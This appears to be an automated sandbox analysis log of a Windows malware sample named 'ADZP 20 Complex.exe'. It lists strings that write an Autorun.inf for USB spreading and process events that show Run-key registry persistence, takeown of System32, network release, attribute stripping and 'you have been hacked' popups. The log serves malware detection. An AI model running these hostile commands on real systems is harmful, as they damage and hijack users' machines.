Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.000000000254C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3314133631.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000003.1972664336.000000000254D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000000.00000002.3321208748.0000000002540000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.0000000002510000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240360738.000000000251C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000003.2030226696.000000000251D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000001E.00000002.3240149731.0000000002160000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.000000000234C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256041689.00000000021A0000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000003.2044192341.000000000234D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 00000025.00000002.3256174955.0000000002340000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.0000000002300000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo off>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: 9B6A.bat.0.dr |
Binary or memory string: echo off>>Autorun.inf |
Source: 9B6A.bat.0.dr |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: 9B6A.bat.0.dr |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: 9B6A.bat.0.dr |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: 9B6A.bat.0.dr |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: 9B6A.bat.0.dr |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: Autorun.inf.2.dr |
Binary or memory string: [AutoRun] |
Source: B53B.bat.37.dr |
Binary or memory string: echo off>>Autorun.inf |
Source: B53B.bat.37.dr |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: B53B.bat.37.dr |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: B53B.bat.37.dr |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: B53B.bat.37.dr |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: B53B.bat.37.dr |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: B134.bat.30.dr |
Binary or memory string: echo off>>Autorun.inf |
Source: B134.bat.30.dr |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: B134.bat.30.dr |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: B134.bat.30.dr |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: B134.bat.30.dr |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: B134.bat.30.dr |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: BE05.bat.47.dr |
Binary or memory string: echo off>>Autorun.inf |
Source: BE05.bat.47.dr |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: BE05.bat.47.dr |
Binary or memory string: echo [AutoRun]>>Autorun.inf |
Source: BE05.bat.47.dr |
Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf |
Source: BE05.bat.47.dr |
Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf |
Source: BE05.bat.47.dr |
Binary or memory string: echo Label=???>>Autorun.inf |
Source: unknown |
Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Taskdl.bat |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\reg.exe reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32" /r |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\reg.exe reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\ipconfig.exe ipconfig /release |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\attrib.exe attrib -r -a -s -h *.* |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msg.exe msg * Virus Detectado |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msg.exe msg * Virus Detectado |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado! |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\notepad.exe notepad |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\calc.exe calc |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\explorer.exe explorer.exe |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mspaint.exe mspaint.exe |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\notepad.exe notepad |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\calc.exe calc |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\explorer.exe explorer.exe |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mspaint.exe mspaint.exe |
|
Source: unknown |
Process created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\notepad.exe notepad |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\calc.exe calc |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\explorer.exe explorer.exe |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe"" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Taskdl.bat |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\reg.exe reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\reg.exe reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\ipconfig.exe ipconfig /release |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\attrib.exe attrib -r -a -s -h *.* |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
